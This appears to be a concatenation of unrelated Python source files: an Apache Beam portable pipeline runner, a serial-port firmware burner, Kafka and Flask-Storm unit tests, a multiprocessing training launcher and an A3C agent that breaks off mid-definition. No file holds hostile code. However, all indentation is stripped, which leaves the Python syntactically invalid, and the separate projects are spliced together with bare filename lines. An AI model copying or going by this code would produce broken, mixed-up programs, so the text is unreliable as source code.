# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
# Eventually remove the 'pre_optimize' option alltogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.pack_combiners,
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('pack_combiners', 'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (ie Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
BurnerManager.py
|
import serial
import serial.tools.list_ports as port_list
from time import sleep as delay
from Utils import Utils
import threading
import sys
from collections import deque as dq
class BurnerManager:
def __init__(self, SerialManager, file, progressBar, console):
self.progressBar = progressBar
self.serialManager = SerialManager
self.fileManager = file
self.console = console
self.console.pub('Burner Manager Started\n')
def burn(self):
self.console.pub('\nBurn .hex file \n')
threading.Thread(target=self.burn_task, daemon=True).start()
def burn_task(self):
code = self.fileManager.code
if not(self.serialManager.connected):
self.serialManager.connect()
res = 'BAD'
for i, line in enumerate(code):
self.serialManager.connection.flushInput()
self.serialManager.write_port_byte(line)
while True:
res = self.serialManager.connection.readline().decode().split('\n')[0]
code = ''
if (res == 'BAD'):
self.console.pub('{} - {} - Error de transmisión - Reenviando...\n'.format(i,line))
self.serialManager.connection.flushInput()
self.serialManager.write_port_byte(line)
elif (res == 'OK'):
self.serialManager.connection.flushInput()
self.console.pub('{} - {} - Linea enviada correctamente. \n'.format(i,line))
print('{} - {} - Linea enviada correctamente.'.format(i,res))
break
self.console.pub('Grabacion finalizada')
print('Grabacion finalizada')
# print('Size of trama:',size)
# size = int(line[1:3],16)+5
# for l in range(size):
# temp = self.serialManager.connection.read()
# code += temp.hex()
# self.console.pub('{} - :{} - Linea enviada correctamente. \n'.format(i,code.upper()))
# code = res = ''
|
test_kafka.py
|
from multiprocessing import Process, Queue
from unittest import TestCase
from threading import Thread
from time import sleep
from unittest.mock import MagicMock
from minibatch import connectdb, stream, streaming, make_emitter
from minibatch.contrib.kafka import KafkaSource, KafkaSink
from minibatch.tests.util import delete_database, LocalExecutor
class KafkaTests(TestCase):
def setUp(self):
self.url = 'mongodb://localhost/test'
delete_database(url=self.url)
self.db = connectdb(url=self.url)
def test_consumer(self):
# we simply inject a mock KafkaConsumer into the KafkaSource
# as we don't want to test KafkaConsumer but KafkaSource
message = MagicMock()
message.value = dict(foo='bar')
source = KafkaSource('topic')
consumer = MagicMock()
consumer.__iter__.return_value = [message]
source._consumer = consumer
s = stream('test', url=self.url)
s.attach(source)
def consumer(q):
url = str(self.url)
@streaming('test', executor=LocalExecutor(), url=url, queue=q)
def process(window):
db = connectdb(url=url)
db.processed.insert(window.data)
q = Queue()
p = Process(target=consumer, args=(q,))
p.start()
sleep(1)
q.put(True)
p.join()
docs = list(self.db.processed.find())
self.assertEqual(len(docs), 1)
def test_sink(self):
# we simply inject a mock KafkaProducer into the KafkaSink
s = stream('test', url=self.url)
s.append(dict(foo='baz'))
sink = KafkaSink('test')
producer = MagicMock()
sink._producer = producer
# create a threaded emitter that we can stop
em = make_emitter('test', url=self.url, sink=sink, emitfn=lambda v: v)
t = Thread(target=em.run)
t.start()
sleep(1)
em._stop = True
# check the sink got called and forward to the mock KafkaProducer
producer.send.assert_called_with('test', value={'foo': 'baz'})
|
test_debug.py
|
import pytest
import re
import sys
from datetime import datetime, timedelta
from flask_storm import store, FlaskStorm
from flask_storm.debug import DebugTracer, get_debug_queries, DebugQuery, ShellTracer
from mock import MagicMock, patch
from storm.exceptions import OperationalError
from threading import Thread
try:
from io import StringIO
except ImportError:
from StringIO import StringIO
# Enable skipping of tests that do not run without sqlparse being installed
try:
import sqlparse
except ImportError:
sqlparse = None
require_sqlparse = pytest.mark.skipif(not sqlparse, reason="requires sqlparse")
require = pytest.mark.usefixtures
@require("app", "flask_storm", "app_context")
def test_get_debug_queries():
with DebugTracer():
store.execute("SELECT 1")
store.execute("SELECT ? + ?", [1, 2])
queries = get_debug_queries()
assert len(queries) == 2
first, second = queries
assert first.statement == "SELECT 1"
assert first.params == ()
assert isinstance(first.start_time, datetime)
assert isinstance(first.end_time, datetime)
assert isinstance(first.duration, timedelta)
assert second.statement == "SELECT ? + ?"
assert second.params == [1, 2]
def test_debug_query():
data = (
"SELECT 1",
(),
datetime(2000, 1, 1),
datetime(2000, 1, 1, second=1))
dq = DebugQuery(*data)
for i, value in enumerate(data):
assert dq[i] == value
def test_debug_query_keys():
dq = DebugQuery(
"SELECT 1",
(),
datetime(2000, 1, 1),
datetime(2000, 1, 1, second=1))
assert dq.statement == "SELECT 1"
assert dq.params == ()
assert dq.start_time == datetime(2000, 1, 1)
assert dq.end_time == datetime(2000, 1, 1, second=1)
assert dq.duration == timedelta(seconds=1)
@require("flask_storm")
def test_tracer_thread_isolation(app, app_context):
with DebugTracer():
store.execute("SELECT 'this'")
# Spawn a separate thread that also executes a query
def other_request():
with app.app_context():
store.execute("SELECT 'other'")
# Ensure main thread does not leak into this one
queries = get_debug_queries()
assert len(queries) == 1
assert queries[0].statement == "SELECT 'other'"
t = Thread(target=other_request)
t.start()
t.join()
# Ensure query log was not polluted by other thread
queries = get_debug_queries()
assert len(queries) == 1
assert queries[0].statement == "SELECT 'this'"
def test_get_debug_queries_no_context():
assert get_debug_queries() == []
def test_query_without_context(app):
fs = FlaskStorm(app)
try:
store = fs.connect()
with DebugTracer():
store.execute("SELECT 1")
# Since no application context is available queries are not saved
# anywhere
assert get_debug_queries() == []
finally:
store.close()
@require("app_context", "flask_storm")
def test_query_error():
try:
with DebugTracer():
store.execute("SELECT !")
except Exception:
pass
queries = get_debug_queries()
assert len(queries) == 1
assert queries[0].statement == "SELECT !"
@require_sqlparse
@require("app_context", "flask_storm")
def test_shell_tracer():
# Alias helper functions
remove_whitespace = pytest.helpers.remove_whitespace
remove_ansi = pytest.helpers.remove_ansi
sql = "SELECT 1 + 1 FROM (SELECT 2 + 2)"
output = StringIO()
output.isatty = MagicMock(return_value=True)
with patch("sys.platform", "linux2"), ShellTracer(file=output, fancy=True):
store.execute(sql)
color_output = output.getvalue()
output.close()
assert color_output != sql
assert \
remove_whitespace(remove_ansi(color_output)).rsplit(";", 1)[0] == \
remove_whitespace(sql)
output = StringIO()
output.isatty = MagicMock(return_value=False)
with ShellTracer(file=output, fancy=False):
store.execute(sql)
colorless_output = output.getvalue()
output.close()
assert color_output != colorless_output
assert \
remove_ansi(color_output).rsplit(";", 1)[0] == \
colorless_output.rsplit(";", 1)[0]
assert \
remove_whitespace(remove_ansi(color_output)).rsplit(";", 1)[0] == \
remove_whitespace(sql)
def test_shell_tracer_defaults():
st = ShellTracer()
assert st.file is sys.stdout
assert st.fancy
@require("app_context", "flask_storm")
def test_shell_tracer_success():
output = StringIO()
with ShellTracer(file=output, fancy=False):
store.execute("SELECT 1")
assert "SUCCESS" in output.getvalue()
output.close()
@require("app_context", "flask_storm")
def test_shell_tracer_failure():
output = StringIO()
with ShellTracer(file=output, fancy=False), pytest.raises(Exception):
store.execute("SELECT !")
assert "FAILURE" in output.getvalue()
output.close()
|
master.py
|
from builtins import str
from builtins import range
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import multiprocessing
import os, sys, time
from config import config, log_config
import util
AGENT_COUNT = config["agent_config"]["count"]
EVALUATOR_COUNT = config["evaluator_config"]["count"]
MODEL_AUGMENTED = config["model_config"] is not False
if config["resume"]:
ROOT_PATH = "output/" + config["env"]["name"] + "/" + config["name"]
else:
ROOT_PATH = util.create_and_wipe_directory("output/" + config["env"]["name"] + "/" + config["name"])
log_config()
import learner, agent, valuerl_learner
if MODEL_AUGMENTED: import worldmodel_learner
if __name__ == '__main__':
all_procs = set([])
interaction_procs = set([])
# lock
policy_lock = multiprocessing.Lock()
model_lock = multiprocessing.Lock() if MODEL_AUGMENTED else None
# queue
policy_replay_frame_queue = multiprocessing.Queue(1)
model_replay_frame_queue = multiprocessing.Queue(1) if MODEL_AUGMENTED else None
# interactors
for interact_proc_i in range(AGENT_COUNT):
interact_proc = multiprocessing.Process(target=agent.main, args=(interact_proc_i, False, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config))
all_procs.add(interact_proc)
interaction_procs.add(interact_proc)
# evaluators
for interact_proc_i in range(EVALUATOR_COUNT):
interact_proc = multiprocessing.Process(target=agent.main, args=(interact_proc_i, True, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config))
all_procs.add(interact_proc)
interaction_procs.add(interact_proc)
# policy training
train_policy_proc = multiprocessing.Process(target=learner.run_learner, args=(valuerl_learner.ValueRLLearner, policy_replay_frame_queue, policy_lock, config, config["env"], config["policy_config"]), kwargs={"model_lock": model_lock})
all_procs.add(train_policy_proc)
# model training
if MODEL_AUGMENTED:
train_model_proc = multiprocessing.Process(target=learner.run_learner, args=(worldmodel_learner.WorldmodelLearner, model_replay_frame_queue, model_lock, config, config["env"], config["model_config"]))
all_procs.add(train_model_proc)
# start all policies
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
for i, proc in enumerate(interaction_procs):
os.environ['CUDA_VISIBLE_DEVICES'] = ''
proc.start()
os.environ['CUDA_VISIBLE_DEVICES'] = str(int(sys.argv[2]))
train_policy_proc.start()
if MODEL_AUGMENTED:
os.environ['CUDA_VISIBLE_DEVICES'] = str(1+int(sys.argv[2]))
train_model_proc.start()
while True:
try:
pass
except:
for proc in all_procs: proc.join()
|
A3C.py
|
import copy
import random
import time
import numpy as np
import torch
from torch import multiprocessing
from torch.multiprocessing import Queue
from torch.optim import Adam
from agents.Base_Agent import Base_Agent
from utilities.Utility_Functions import create_actor_distribution, SharedAdam
class A3C(Base_Agent):
"""Actor critic A3C algorithm from deepmind paper https://arxiv.org/pdf/1602.01783.pdf"""
agent_name = "A3C"
def __init__(self, config):
super(A3C, self).__init__(config)
self.num_processes = multiprocessing.cpu_count()
self.worker_processes = max(1, self.num_processes - 2)
self.actor_critic = self.create_NN(input_dim=self.state_size, output_dim=[self.action_size, 1])
self.actor_critic_optimizer = SharedAdam(self.actor_critic.parameters(), lr=self.hyperparameters["learning_rate"], eps=1e-4)
def run_n_episodes(self):
"""Runs game to completion n times and then summarises results and saves model (if asked to)"""
start = time.time()
results_queue = Queue()
gradient_updates_queue = Queue()
episode_number = multiprocessing.Value('i', 0)
self.optimizer_lock = multiprocessing.Lock()
episodes_per_process = int(self.config.num_episodes_to_run / self.worker_processes) + 1
processes = []
self.actor_critic.share_memory()
self.actor_critic_optimizer.share_memory()
optimizer_worker = multiprocessing.Process(target=self.update_shared_model, args=(gradient_updates_queue,))
optimizer_worker.start()
for process_num in range(self.worker_processes):
worker = Actor_Critic_Worker(process_num, copy.deepcopy(self.environment), self.actor_critic, episode_number, self.optimizer_lock,
self.actor_critic_optimizer, self.config, episodes_per_process,
self.hyperparameters["epsilon_decay_rate_denominator"],
self.action_size, self.action_types,
results_queue, copy.deepcopy(self.actor_critic), gradient_updates_queue)
worker.start()
processes.append(worker)
self.print_results(episode_number, results_queue)
for worker in processes:
worker.join()
optimizer_worker.kill()
time_taken = time.time() - start
return self.game_full_episode_scores, self.rolling_results, time_taken
def print_results(self, episode_number, results_queue):
"""Worker that prints out results as they get put into a queue"""
while True:
with episode_number.get_lock():
carry_on = episode_number.value < self.config.num_episodes_to_run
if carry_on:
if not results_queue.empty():
self.total_episode_score_so_far = results_queue.get()
self.save_and_print_result()
else: break
def update_shared_model(self, gradient_updates_queue):
"""Worker that updates the shared model with gradients as they get put into the queue"""
while True:
gradients = gradient_updates_queue.get()
with self.optimizer_lock:
self.actor_critic_optimizer.zero_grad()
for grads, params in zip(gradients, self.actor_critic.parameters()):
params._grad = grads # maybe need to do grads.clone()
self.actor_critic_optimizer.step()
class Actor_Critic_Worker(torch.multiprocessing.Process):
"""Actor critic worker that will play the game for the designated number of episodes """
def __init__(self, worker_num, environment, shared_model, counter, optimizer_lock, shared_optimizer,
config, episodes_to_run, epsilon_decay_denominator, action_size, action_types, results_queue,
local_model, gradient_updates_queue):
super(Actor_Critic_Worker, self).__init__()
self.environment = environment
self.config = config
self.worker_num = worker_num
self.gradient_clipping_norm = self.config.hyperparameters["gradient_clipping_norm"]
self.discount_rate = self.config.hyperparameters["discount_rate"]
self.normalise_rewards = self.config.hyperparameters["normalise_rewards"]
self.action_size = action_size
self.set_seeds(self.worker_num)
self.shared_model = shared_model
self.local_model = local_model
self.local_optimizer = Adam(self.local_model.parameters(), lr=0.0, eps=1e-4)
self.counter = counter
self.optimizer_lock = optimizer_lock
self.shared_optimizer = shared_optimizer
self.episodes_to_run = episodes_to_run
self.epsilon_decay_denominator = epsilon_decay_denominator
